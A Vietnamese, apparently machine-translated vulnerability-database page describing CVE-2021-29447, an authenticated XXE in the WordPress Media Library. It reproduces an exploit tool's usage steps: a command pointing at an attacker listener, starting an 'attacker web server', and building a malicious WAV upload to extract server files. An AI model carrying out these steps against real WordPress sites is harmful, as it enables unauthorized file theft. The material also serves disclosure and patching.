Tất cả thông tin có trong cơ sở dữ liệu này được cung cấp bởi Wordfence Intelligence.
Bạn muốn tích hợp dữ liệu này vào nền tảng hoặc mạng của mình?
Liên hệ với chúng tôi ngay bây giờ để thảo luận về quyền truy cập API vào Nguồn cấp dữ liệu thông minh Wordfence của chúng tôi.
Khai thác WordPress Media Library XML đã xác thực External Entity Injection [XXE] để trích xuất các tệp
Đã vá trong WordPress 5. 7. 1
Yêu cầu thông tin đăng nhập WordPress hợp lệ để tương tác với Thư viện phương tiện
Cách sử dụng
python3 wordpress-cve-2021-29447.py -l //LOCAL_IP:PORT -r //WORDPRESS_URL -u USERNAME -p PASSWORD
Tập lệnh sẽ yêu cầu đường dẫn tệp và trả về tệp được yêu cầu
Tín dụng
Lấy cảm hứng từ tập lệnh ExploitDB của David Utón [M3n0sD0n4ld]
từ chối trách nhiệm
Việc sử dụng điều này để tấn công các mục tiêu mà không có sự đồng ý trước của cả hai bên là bất hợp pháp. Người dùng cuối có trách nhiệm tuân thủ tất cả các luật hiện hành của địa phương, tiểu bang và liên bang. Các nhà phát triển không chịu trách nhiệm pháp lý và không chịu trách nhiệm cho bất kỳ sự lạm dụng hoặc thiệt hại nào do chương trình này gây ra. Chỉ sử dụng cho mục đích giáo dục
sử dụng
Bước 1. Chạy WordPress
$ make up-wp
Bước 2. Chạy máy chủ web Attacker
$ make up-mal
Bước 3. Tạo tệp WAV độc hại
Không có npm wavefile [Khuyến nghị]
$ echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00\x00'> malicious.wav
Với tệp sóng npm
$ make make-wav
Bước 4. Đăng nhập vào WordPress & Tải tệp WAV lên Phương tiện Mới
Bước5. giải mã
Người giới thiệu
- wordpress 5. 6-5. 7 - XXE được xác thực trong Thư viện phương tiện ảnh hưởng đến lỗ hổng bảo mật PHP 8
Wordpress là một CMS mã nguồn mở. Người dùng có khả năng tải tệp lên [như Tác giả] có thể khai thác sự cố phân tích cú pháp XML trong Thư viện phương tiện dẫn đến các cuộc tấn công XXE. Điều này yêu cầu cài đặt WordPress đang sử dụng PHP 8. Có thể truy cập vào các tệp nội bộ trong một cuộc tấn công XXE thành công. Điều này đã được vá trong phiên bản WordPress 5. 7. 1, cùng với các phiên bản cũ hơn bị ảnh hưởng thông qua một bản phát hành nhỏ. Chúng tôi thực sự khuyên bạn nên bật cập nhật tự động
Lỗ hổng được xác thực [quản trị viên hoặc vai trò người dùng cao hơn] Bao gồm tệp cục bộ [LFI] trong plugin Hover Effects của Wow-Company